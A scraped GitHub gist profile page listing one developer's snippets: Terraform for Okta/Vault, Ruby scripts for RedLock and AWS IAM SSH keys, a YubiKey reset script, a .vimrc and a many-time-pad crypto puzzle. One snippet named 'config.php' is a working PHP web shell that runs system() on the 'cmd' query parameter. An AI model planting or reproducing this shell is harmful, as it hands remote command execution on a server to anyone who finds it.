Skip to content

Instantly share code, notes, and snippets.

Avatar

Ryan Canty onetwopunch

View GitHub Profile
@onetwopunch
onetwopunch / tink-hybrid.md
Last active Sep 30, 2020
Using Tink for Hybrid Encryption
View tink-hybrid.md

Moved

I've migrated the contents of this Gist to this Medium post for better readability.

View sample.tf
module "okta" {
source = "onetwopunch/okta/vault"
version = "<version>"
okta_discovery_url = "<Okta Authorization Server Issuer>"
okta_client_id = "<Okta Vault App Client ID>"
okta_client_secret = "<Okta Vault App Client Secret>"
vault_addr = "https://<Vault Domain>:8200"
okta_bound_audiences = [
"api://vault",
@onetwopunch
onetwopunch / redlock.rb
Last active Oct 16, 2018
Pull alerts from RedLock given a JWT
View redlock.rb
#!/usr/bin/env ruby
require 'httparty'
require 'json'
class Redlock
include HTTParty
base_uri 'https://app.redlock.com'
def initiailize(jwt)
@onetwopunch
onetwopunch / iam-ssh-auth
Created Feb 18, 2018
IAM SSH Authentication for use with AuthorizedKeysCommand
View iam-ssh-auth
#!/usr/bin/env ruby
require 'aws-sdk-iam'
client = Aws::IAM::Client.new
resp = client.list_ssh_public_keys(user_name: ARGV[1], max_items: 1)
pub_key_id = resp.ssh_public_keys.first.ssh_public_key_id
puts client.get_ssh_public_key({
user_name: ARGV[1],
View yk-reset.sh
#!/bin/bash
echo "This will wipe the Yubikey and restore to factory settings"
read -p "Are you sure? (y/n)" -n 1 -r
if [[ $REPLY =~ ^[Yy]$ ]]
then
gpg-connect-agent <<EOF
/hex
scd serialno
scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40
scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40
View config.php
<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);
system($_GET['cmd']);
?>
View .vimrc
"External plugins used:
" Pathogen
" NERDTree
" AutoComplPop
" DetectIndent
" L9 for autocomplete
" ACK
"
"Use Vim settings, rather than Vi settings (much better!).
" This must be first, because it changes other options as a side effect.
View one-time-pad-puzzle.md

Many Time Pad

Let us see what goes wrong when a stream cipher key is used more than once. Below are eleven hex-encoded ciphertexts that are the result of encrypting eleven plaintexts with a stream cipher, all with the same stream cipher key. Your goal is to decrypt the last ciphertext, and submit the secret message within it as solution.

Hint: XOR the ciphertexts together, and consider what happens when a space is XORed with a character in [a-zA-Z].

ciphertext #1:

315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e
View keybase.io
### Keybase proof
I hereby claim:
* I am onetwopunch on github.
* I am jryancanty (https://keybase.io/jryancanty) on keybase.
* I have a public key ASBR6C_i42SrAvGAVoFbdfAonNSS2_HP8dPN0L3W4xKfYQo
To claim this, I am signing this object:
@onetwopunch
onetwopunch / Sublime Like Vim
Created Nov 22, 2013
I like using Sublime Text but I wanted a quick way to use it from the Terminal in MacOSX. This is how you use Sublime Text in the Terminal just like vim.
View Sublime Like Vim
First, you create a new file: ~/Scripts/lime.sh
file=$1
if [ ! -e "$file" ] ; then
touch "$file"
fi
open -a Sublime\ Text\ 2 $file
Since I keep this with my handy scripts in my home directory, I just make it executable to other users with:
You can’t perform that action at this time.